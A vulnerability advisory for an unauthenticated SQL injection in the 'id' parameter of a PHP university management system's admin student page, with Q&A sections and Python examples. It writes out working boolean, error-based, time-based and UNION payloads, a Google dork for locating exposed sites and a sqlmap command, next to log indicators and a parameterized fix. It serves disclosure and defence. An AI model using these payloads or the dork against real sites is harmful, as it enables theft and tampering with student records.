CVE-2026-3413
SQL Injection in itsourcecode University Management System Admin Module
Publication date: 2026-03-02
Last updated on: 2026-04-29
Assigner: VulDB
Description
CVSS Scores
EPSS Scores
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| angeljudesuarez | university_management_system | 1.0 |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-74 | The product constructs all or part of a command, data structure, or record using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify how it is parsed or interpreted when it is sent to a downstream component. |
| CWE-89 | The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2026-3413 is a critical SQL injection vulnerability in itsourcecode University Management System 1.0, in the admin module file /admin_single_student.php. The value of the 'id' request parameter is placed into an SQL query without validation or escaping, so quote characters and SQL keywords in it are interpreted as part of the query rather than as data.

The flaw is reachable remotely and requires no authentication. An attacker who exploits it can alter the query the page executes, read data from the database, modify or delete records, and potentially compromise the system as a whole. [1, 2, 3]
How can this vulnerability impact me?
The consequences range from unauthorized database access and data leakage to data modification or deletion, and potentially full system compromise or service disruption:

- Attackers can retrieve sensitive information from the database.
- Data integrity can be compromised by unauthorized modification or deletion of records.
- Availability may be affected, leading to service disruption.
- No authentication is required, so any party that can reach the admin module over the network can attempt it. [1, 2, 3]
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?
I don't know
How can this vulnerability be detected on my network or system? Can you suggest some commands?
The flaw is confirmed by sending SQL injection probes in the 'id' parameter of /admin_single_student.php and comparing each response with a baseline request for a known id (123456 in the payloads below). The proof-of-concept payloads cover the four classic techniques; each one closes the original quoted string with a single quote and reopens it at the end so the resulting query stays syntactically valid:

- Boolean-based blind: `id=123456' AND 7955=7955 AND 'foPK'='foPK` (a true condition; the same request with a false condition such as 7955=7956 must produce a different response)
- Error-based: `id=123456' OR (SELECT 9080 FROM(SELECT COUNT(*),CONCAT(0x716b6b7671,(SELECT (ELT(9080=9080,1))),0x71766b7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'VUfE'='VUfE` (the MySQL FLOOR(RAND(0)*2) duplicate-key trick; the injected marker is reflected in the database error)
- Time-based blind: `id=123456' AND (SELECT 5905 FROM (SELECT(SLEEP(5)))ErHA) AND 'IsOV'='IsOV` (the response is delayed by about five seconds)
- UNION query: `id=123456' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b6b7671,0x4758496b426561576e72596f5569746b5a6e7846414d4a5262427a5654506e684a5265496e455068,0x71766b7071),NULL,NULL,NULL-- -` (assumes the original SELECT returns ten columns and that column seven is rendered in the page)

The error-based and time-based payloads depend on MySQL functions and will not work unchanged against another database engine. Testing can be automated with sqlmap, which generates exactly this family of payloads. On the defensive side, the same strings stand out in web server access logs: requests to admin_single_student.php whose id value contains a single quote, UNION, SLEEP(, INFORMATION_SCHEMA or the marker 0x716b6b7671 are injection attempts, not legitimate numeric ids. Exposed instances can also be located with the Google dork `inurl:admin_single_student.php`. [2, 3]
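The following is an added worked example, not code from the itsourcecode project or from this page's sources. It models the flaw described in the explanation above and the boolean-based differential test from the detection answer, in Python against an in-memory SQLite database (the real application is PHP on MySQL, so the MySQL-only error-based and time-based probes are not reproduced). The table name `students`, its columns and the two sample rows are constructed for the example; the application's actual schema is not given on this page. `vulnerable_lookup` reproduces the string-concatenation pattern behind /admin_single_student.php, `safe_lookup` is the same query with the value bound as a parameter, `boolean_based_check` is the true/false comparison that sqlmap's boolean-based mode performs, and `union_extract` is the UNION technique adapted to the assumed three-column query.

```python
import sqlite3

# Added example, not the project's code. Schema, column names and sample rows
# are assumed; SQLite stands in for the application's MySQL backend.


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE students (id TEXT PRIMARY KEY, name TEXT, email TEXT)")
    conn.executemany(
        "INSERT INTO students VALUES (?, ?, ?)",
        [("123456", "Ada Lovelace", "ada@example.edu"),
         ("654321", "Alan Turing", "alan@example.edu")],
    )
    return conn


def vulnerable_lookup(conn, student_id):
    """The flawed pattern: the request's id value is spliced into the SQL text,
    so a single quote and any SQL after it are parsed as SQL, not as data."""
    sql = f"SELECT id, name, email FROM students WHERE id = '{student_id}'"
    return conn.execute(sql).fetchall()


def safe_lookup(conn, student_id):
    """Prepared statement with a bound parameter: the value travels separately
    from the query text and can never change the query's structure."""
    return conn.execute(
        "SELECT id, name, email FROM students WHERE id = ?", (student_id,)
    ).fetchall()


def boolean_based_check(fetch, known_id):
    """Boolean-based blind test, the technique behind the first payload above.
    Appending a TRUE condition to a known-good id must leave the response
    unchanged, and the same payload with a FALSE condition must change it.
    Only input that reaches the SQL parser behaves that way; a parameterized
    endpoint returns nothing for both probes."""
    baseline = fetch(known_id)
    if not baseline:
        return False  # nothing to compare against
    with_true = fetch(f"{known_id}' AND 7955=7955 AND 'foPK'='foPK")
    with_false = fetch(f"{known_id}' AND 7955=7956 AND 'foPK'='foPK")
    return with_true == baseline and with_false != baseline


# UNION extraction adapted to the assumed three-column SELECT. The payload on
# this page targets a ten-column MySQL query; the column count must match the
# original SELECT or the database rejects the statement. The trailing "-- -"
# comments out the closing quote the application appends.
UNION_PAYLOAD = "123456' UNION ALL SELECT NULL, sqlite_version(), NULL-- -"


def union_extract(conn):
    """Returns the legitimate row plus one attacker-chosen row appended by UNION."""
    return vulnerable_lookup(conn, UNION_PAYLOAD)


if __name__ == "__main__":
    db = make_db()
    print("concatenating endpoint flagged:",
          boolean_based_check(lambda v: vulnerable_lookup(db, v), "123456"))
    print("parameterized endpoint flagged:",
          boolean_based_check(lambda v: safe_lookup(db, v), "123456"))
    for row in union_extract(db):
        print(row)
```

Against a live target the `fetch` callable would wrap an HTTP GET of /admin_single_student.php and return the response body, with the comparison done on the parts of the page that vary with the query result. sqlmap performs the same comparison automatically, for example with `sqlmap -u "http://<host>/admin_single_student.php?id=123456" -p id --dbms=mysql`.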
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation steps:

- Rewrite the query behind /admin_single_student.php as a prepared statement with the 'id' value bound as a parameter, so SQL code and user input are never combined in one string.
- Validate the 'id' parameter against its expected format (a numeric student id) and reject anything else before it reaches the database; every probe listed above fails this check at the first quote character.
- Run the application with a database account that holds only the privileges the pages need (SELECT on the tables they read) rather than 'root' or another administrative account, so a successful injection cannot drop tables or write files.
- Until the code is fixed, restrict network access to the admin module and log and block requests whose id value contains quotes or SQL keywords.
- Conduct regular security audits of the code base to find the same concatenation pattern in other pages.

No official patch or vendor countermeasure has been reported; if the application cannot be fixed in-house, consider replacing the affected component with an alternative product. [2, 3]
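As a second added example (again not the project's code), the following is a hardened version of the same lookup that applies the first three steps above: allow-list validation of the id, parameter binding, and a read-only database connection standing in for a least-privilege MySQL account. It is written in Python over SQLite so it runs stand-alone; in the PHP application the equivalent is a mysqli or PDO prepared statement and a MySQL user granted only SELECT on the tables the admin pages read. The schema, the sample rows and the `handle_request` shape (a dict of query parameters in, an HTTP status and a record out) are assumed.

```python
import re
import sqlite3

# Added example, not the project's code. Schema and sample rows are assumed;
# SQLite's query_only pragma is used as an analog of a SELECT-only DB account.


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE students (id INTEGER PRIMARY KEY, name TEXT, email TEXT)")
    conn.executemany(
        "INSERT INTO students VALUES (?, ?, ?)",
        [(123456, "Ada Lovelace", "ada@example.edu"),
         (654321, "Alan Turing", "alan@example.edu")],
    )
    return conn


ID_PATTERN = re.compile(r"[0-9]{1,10}")


def parse_student_id(raw):
    """Control 1, allow-list validation: a student id is a short run of digits,
    so anything else (a quote, a keyword, a missing value) is rejected before
    it gets anywhere near the database."""
    if not isinstance(raw, str) or not ID_PATTERN.fullmatch(raw):
        raise ValueError("invalid student id")
    return int(raw)


def open_readonly(conn):
    """Control 3, least privilege: a view page only reads, so the connection is
    pinned read-only. Any UPDATE, DELETE or DROP smuggled in through a future
    bug fails at the database instead of succeeding silently."""
    conn.execute("PRAGMA query_only = ON")
    return conn


def lookup_student(conn, raw_id):
    """Control 2, parameter binding: even if validation were bypassed, the value
    is bound as data and cannot alter the statement."""
    student_id = parse_student_id(raw_id)
    return conn.execute(
        "SELECT id, name, email FROM students WHERE id = ?", (student_id,)
    ).fetchone()


def handle_request(conn, params):
    """Mirrors the page handler: ?id=... in, (status, record) out."""
    try:
        row = lookup_student(conn, params.get("id"))
    except ValueError:
        return 400, None
    if row is None:
        return 404, None
    return 200, {"id": row[0], "name": row[1], "email": row[2]}


def write_blocked(conn):
    """True when the read-only connection refuses a destructive statement."""
    try:
        conn.execute("DELETE FROM students")
        return False
    except sqlite3.OperationalError:
        return True


if __name__ == "__main__":
    db = open_readonly(make_db())
    print(handle_request(db, {"id": "123456"}))
    print(handle_request(db, {"id": "123456' AND 7955=7955 AND 'foPK'='foPK"}))
    print("writes blocked:", write_blocked(db))
```

The validation step alone stops every payload listed on this page, but it is the binding that makes the fix durable: a later change that loosens the pattern (for example to accept alphanumeric ids) would reopen the hole if the query were still built by concatenation.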